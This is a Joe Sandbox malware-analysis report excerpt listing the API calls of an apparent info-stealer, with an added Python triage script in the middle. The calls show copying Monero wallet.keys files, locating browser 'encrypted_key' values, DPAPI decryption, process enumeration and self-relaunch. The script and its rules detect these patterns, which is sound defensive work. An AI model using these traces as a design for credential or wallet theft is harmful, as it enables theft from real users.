                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 00178B60: GetSystemTime.KERNEL32(00180E1A,00CCEEF0,001805AE,?,?,001613F9,?,0000001A,00180E1A,00000000,?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 00178B86
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0016D481
                          • lstrlen.KERNEL32(00000000), ref: 0016D698
                          • lstrlen.KERNEL32(00000000), ref: 0016D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0016D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: fe715aac5f1964b0868055ba50f5767f57c6d5de7fa1a0a859d8ff585b96188a
                          • Instruction ID: 8532f78767d8195d66d513d2e31c8dfc6efb0c80c4d3b81c83b24711b01178f7
                          • Opcode Fuzzy Hash: fe715aac5f1964b0868055ba50f5767f57c6d5de7fa1a0a859d8ff585b96188a
                          • Instruction Fuzzy Hash: AE9104729101089BDB05FBA4DC96DEE733CAFA4305F90C169F51BA6091EF346A49CB63
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 00178B60: GetSystemTime.KERNEL32(00180E1A,00CCEEF0,001805AE,?,?,001613F9,?,0000001A,00180E1A,00000000,?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 00178B86
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0016D801
                          • lstrlen.KERNEL32(00000000), ref: 0016D99F
                          • lstrlen.KERNEL32(00000000), ref: 0016D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0016DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                           • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
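The function records above repeat a few call patterns worth pulling out mechanically: GetModuleFileNameA with a 0x104 (MAX_PATH) buffer followed by ShellExecuteEx with cbSize 0x3C (the 32-bit SHELLEXECUTEINFOA size, the "<" in that record's String ID) and ExitProcess; RegOpenKeyExA with samDesired 0x20119, which is KEY_READ | KEY_WOW64_64KEY; and three CopyFileA/DeleteFileA routines at 0016A2E1, 0016D481 and 0016D801 whose helper 0017A9B0 references \Monero\wallet.keys and which all carry API String ID 211194620-0. The script below is an added example written for this page, not Joe Sandbox code and not code from the sample: it parses the record layout (assumed only from the lines shown), flags those patterns with behavioural rules whose labels are mine, decodes the registry access mask, and groups records by API String ID to expose the duplicated routines. The embedded input is a constructed excerpt of the records above with the hash and memory-dump lines left out.

```python
"""Triage helper for the per-function "Similarity" / "APIs" records in a Joe Sandbox
disassembly section.  Added example, not Joe Sandbox code; it assumes only the layout above."""
import re
from collections import defaultdict, namedtuple

# Constructed excerpt: API names, arguments, addresses and the "\Monero\wallet.keys" string
# are copied from the records above; fuzzy-hash and memory-dump lines are left out.
SAMPLE = r"""Similarity
• API ID: Heap$AllocateCloseOpenProcessQueryValue
• API String ID: 3225020163-0
APIs
• RtlAllocateHeap.NTDLL(00000000), ref: 001612BB
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001612D7
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001612F5
Similarity
• API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
• API String ID: 1148417306-4251816714
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00176663
  • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
• ShellExecuteEx.SHELL32(0000003C), ref: 00176726
• ExitProcess.KERNEL32 ref: 00176755
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
• API String ID: 211194620-0
APIs
  • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0016A2E1
• DeleteFileA.KERNEL32(00000000), ref: 0016A743
Similarity
• API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
• API String ID: 211194620-0
APIs
  • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0016D481
• DeleteFileA.KERNEL32(00000000), ref: 0016D72B
"""

FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID|API String ID):\s*(?P<val>.*)$")
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\s*(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
Call = namedtuple("Call", "name module args ref subcall_of")  # subcall_of: callee address or None

def parse_records(text):
    """One {'fields': {...}, 'calls': [Call, ...]} per 'Similarity' block."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Similarity":
            records.append(cur := {"fields": {}, "calls": []})
        elif cur is not None:
            if (m := FIELD_RE.match(line)):
                cur["fields"][m["key"]] = m["val"].strip()
            elif (m := CALL_RE.match(line)):
                cur["calls"].append(Call(m["name"], m["module"], m["args"] or "", int(m["ref"], 16),
                                         int(m["sub"], 16) if m["sub"] else None))
    return records

def own_refs(rec):  # call sites in the function body itself; subcall lines belong to callees
    return [c.ref for c in rec["calls"] if c.subcall_of is None]

# (label, APIs that must all appear incl. subcalls, substring that must occur in some argument)
RULES = [
    ("wallet file staged with CopyFile then DeleteFile", {"CopyFileA", "DeleteFileA"}, "wallet.keys"),
    ("re-executes its own image and exits", {"GetModuleFileNameA", "ShellExecuteEx", "ExitProcess"}, None),
    ("reads a registry value into a heap buffer", {"RtlAllocateHeap", "RegOpenKeyExA", "RegQueryValueExA"}, None),
]

def match_rules(rec):
    names = {c.name for c in rec["calls"]}
    args = " ".join(c.args for c in rec["calls"])
    return [label for label, apis, needle in RULES if apis <= names and (needle is None or needle in args)]

def decode_reg_access(mask):
    """Name the samDesired bits of RegOpenKeyEx; KEY_READ is 0x20019 in the Win32 headers."""
    names = []
    if (mask & 0x20019) == 0x20019:
        names.append("KEY_READ"); mask &= ~0x20019
    for bit, name in ((0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
                      (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")):
        if mask & bit:
            names.append(name); mask &= ~bit
    return names + ([f"0x{mask:X}"] if mask else [])  # anything left over is reported raw

def reg_open_masks(rec):
    """Decoded samDesired (4th argument) of each RegOpenKeyExA call; '?' means not recovered."""
    sams = [(c.args.split(",") + ["?"] * 4)[3] for c in rec["calls"] if c.name == "RegOpenKeyExA"]
    return [decode_reg_access(int(s, 16)) for s in sams if s != "?"]

def cluster_by_api_string_id(records):
    """Records sharing an API String ID are near-duplicate routines: same API set, same strings."""
    groups = defaultdict(list)
    for r in records:
        groups[r["fields"].get("API String ID", "")].append(r)
    return {k: v for k, v in groups.items() if k and len(v) > 1}

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(f"{min(own_refs(r)):08X}  {match_rules(r)}  {reg_open_masks(r)}")
    for sid, members in cluster_by_api_string_id(recs).items():
        print(sid, "appears", len(members), "times at", [f"{min(own_refs(m)):08X}" for m in members])
```

Run as a script it prints one line per record plus the duplicate clusters; for a real report, pass the text of the whole disassembly section to parse_records instead of SAMPLE. "Part of subcall function" lines are attributed to the callee through subcall_of, so own_refs yields only the function's own call sites, while the rules deliberately match on the union so that a wallet path seen only inside a helper still counts against the caller. The rule labels are illustrative and nothing here asserts what the sample does beyond the API names and strings the report itself lists.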
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 381197fad15b1e153ae7e5591db2caf3c39a6f5f73652054e1d1de5cd641797f
                          • Instruction ID: 41ed828b37c935754a2cbe3518e89612064a02e947ecb77724a9a50b5f06fcf5
                          • Opcode Fuzzy Hash: 381197fad15b1e153ae7e5591db2caf3c39a6f5f73652054e1d1de5cd641797f
                          • Instruction Fuzzy Hash: 808103729101089BCB05FBA4DC56DEE733CAFA4305F908529F51BA7091EF346A59CBA3
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                            • Part of subcall function 001699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                            • Part of subcall function 001699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                            • Part of subcall function 001699C0: ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                            • Part of subcall function 001699C0: LocalFree.KERNEL32(0016148F), ref: 00169A90
                            • Part of subcall function 001699C0: CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                            • Part of subcall function 00178E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00178E52
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00181580,00180D92), ref: 0016F54C
                          • lstrlen.KERNEL32(00000000), ref: 0016F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 71b48da28d885dfbeba572220aa5a676bc0ed1952f653ed52670e223ce6d0ca6
                          • Instruction ID: 6c5337f757beaae175ed915ca73343f5af54604a4e0f6063c6bd274415f770d9
                          • Opcode Fuzzy Hash: 71b48da28d885dfbeba572220aa5a676bc0ed1952f653ed52670e223ce6d0ca6
                          • Instruction Fuzzy Hash: 7351D471D10108AADB04FBB4DC56DEE7379AFA4305F80C528F51A67191EF346B19CBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 15844fe7f100ebe3fd601ba2c75fff6a751a216e1988d5ad9790a1734a23f34a
                          • Instruction ID: f52afc7b01b09a158164181295877116b0b766c707ef7f7d2cd09c3b5cd78e07
                          • Opcode Fuzzy Hash: 15844fe7f100ebe3fd601ba2c75fff6a751a216e1988d5ad9790a1734a23f34a
                          • Instruction Fuzzy Hash: E5415171D10109ABCB09EFA4D845AEEB778AF58304F40C418F52A77290DB35AB49DFA2
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 001699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                            • Part of subcall function 001699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                            • Part of subcall function 001699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                            • Part of subcall function 001699C0: ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                            • Part of subcall function 001699C0: LocalFree.KERNEL32(0016148F), ref: 00169A90
                            • Part of subcall function 001699C0: CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                            • Part of subcall function 00178E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00178E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00169D39
                            • Part of subcall function 00169AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169AEF
                            • Part of subcall function 00169AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00164EEE,00000000,?), ref: 00169B01
                            • Part of subcall function 00169AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169B2A
                            • Part of subcall function 00169AC0: LocalFree.KERNEL32(?,?,?,?,00164EEE,00000000,?), ref: 00169B3F
                            • Part of subcall function 00169B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00169B84
                            • Part of subcall function 00169B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00169BA3
                            • Part of subcall function 00169B60: LocalFree.KERNEL32(?), ref: 00169BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 5ea9ad89d69721b070024daf7a289ebdc62124fadd7ac00e80234c76812718bd
                          • Instruction ID: 8804643b6028ee165ec2021e0669bc2a43b7bc9bc7541a28cf3017e83061a6a6
                          • Opcode Fuzzy Hash: 5ea9ad89d69721b070024daf7a289ebdc62124fadd7ac00e80234c76812718bd
                          • Instruction Fuzzy Hash: 07314FB6D10209ABCF04EBE4DC85AEFB7BCAF58304F144529E905A7241EB349A15CBA1
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001805B7), ref: 001786CA
                          • Process32First.KERNEL32(?,00000128), ref: 001786DE
                          • Process32Next.KERNEL32(?,00000128), ref: 001786F3
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • CloseHandle.KERNEL32(?), ref: 00178761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: e99e9b582d43c1e069650fdb29c9ab33d3800ee143f838d4c180a34760aba6cc
                          • Instruction ID: 13ae7df500ec9d0abd1705476fe47b757071308a8c2720ccb8ade9e8b930047b
                          • Opcode Fuzzy Hash: e99e9b582d43c1e069650fdb29c9ab33d3800ee143f838d4c180a34760aba6cc
                          • Instruction Fuzzy Hash: BC315C71941218ABCB29EB94CC55FEEB778EF55701F508199A10EA21A0DB306B45CFA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00180E00,00000000,?), ref: 001779B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001779B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00180E00,00000000,?), ref: 001779C4
                          • wsprintfA.USER32 ref: 001779F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 77149ac084d2586a277e4c256211b992114cbf572ac52d1dae9ce9dbe6b401d4
                          • Instruction ID: a632a87d994617cf8c14ad42bd8395f63222ee428787fbc1ec1e11bd2b3f7116
                          • Opcode Fuzzy Hash: 77149ac084d2586a277e4c256211b992114cbf572ac52d1dae9ce9dbe6b401d4
                          • Instruction Fuzzy Hash: F01115B2904518AACB149FC9ED45BBEBBFCEB49B11F10421AF605A2290E3395940CBB1
                          APIs
                          • CreateFileA.KERNEL32(00173AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00173AEE,?), ref: 001792FC
                          • GetFileSizeEx.KERNEL32(000000FF,00173AEE), ref: 00179319
                          • CloseHandle.KERNEL32(000000FF), ref: 00179327
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: cb1a654887b64a27c2fcbea9fe89a6de1216557b29e7607b687837aa3505dc7c
                          • Instruction ID: 7d8bc08a4fa027702893502ce1c42bcead2e43946b4370fad9d373937ec899f6
                          • Opcode Fuzzy Hash: cb1a654887b64a27c2fcbea9fe89a6de1216557b29e7607b687837aa3505dc7c
                          • Instruction Fuzzy Hash: E0F0873AE40208BBDB14DBF0DC08BAE77B9BB48320F10C254BA15A72D0D775AA04CB40
                          APIs
                          • __getptd.LIBCMT ref: 0017C74E
                            • Part of subcall function 0017BF9F: __amsg_exit.LIBCMT ref: 0017BFAF
                          • __getptd.LIBCMT ref: 0017C765
                          • __amsg_exit.LIBCMT ref: 0017C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0017C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: a4a6dfb4d736cd7b457577d5d9845fbe2c1bd170493ec1750bc9c299e1b2c873
                          • Instruction ID: 02df89f9bf68da92e9c604572d98d9daa74550e535a787f9b803dc4007984ed9
                          • Opcode Fuzzy Hash: a4a6dfb4d736cd7b457577d5d9845fbe2c1bd170493ec1750bc9c299e1b2c873
                          • Instruction Fuzzy Hash: 27F09A329486009BD728BBB89886B4E33B06F20B20F20C14DF40DA72D2CF645A809FD6
                          APIs
                            • Part of subcall function 00178DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00178E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00174F7A
                          • lstrcat.KERNEL32(?,00181070), ref: 00174F97
                          • lstrcat.KERNEL32(?,00CC91C8), ref: 00174FAB
                          • lstrcat.KERNEL32(?,00181074), ref: 00174FBD
                            • Part of subcall function 00174910: wsprintfA.USER32 ref: 0017492C
                            • Part of subcall function 00174910: FindFirstFileA.KERNEL32(?,?), ref: 00174943
                            • Part of subcall function 00174910: StrCmpCA.SHLWAPI(?,00180FDC), ref: 00174971
                            • Part of subcall function 00174910: StrCmpCA.SHLWAPI(?,00180FE0), ref: 00174987
                            • Part of subcall function 00174910: FindNextFileA.KERNEL32(000000FF,?), ref: 00174B7D
                            • Part of subcall function 00174910: FindClose.KERNEL32(000000FF), ref: 00174B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: bb37eab8e88f3beeaa2dc113c6b8993e5368f024131e44bf80331adb168214fd
                          • Instruction ID: 764506a482e21f42ea94a478ed780eef602420c1deb8059751fcd8833a57e076
                          • Opcode Fuzzy Hash: bb37eab8e88f3beeaa2dc113c6b8993e5368f024131e44bf80331adb168214fd
                          • Instruction Fuzzy Hash: 8D21887790020867C795FBA0DC46EED777CABAA300F004558B65A97181EF749BC9CB92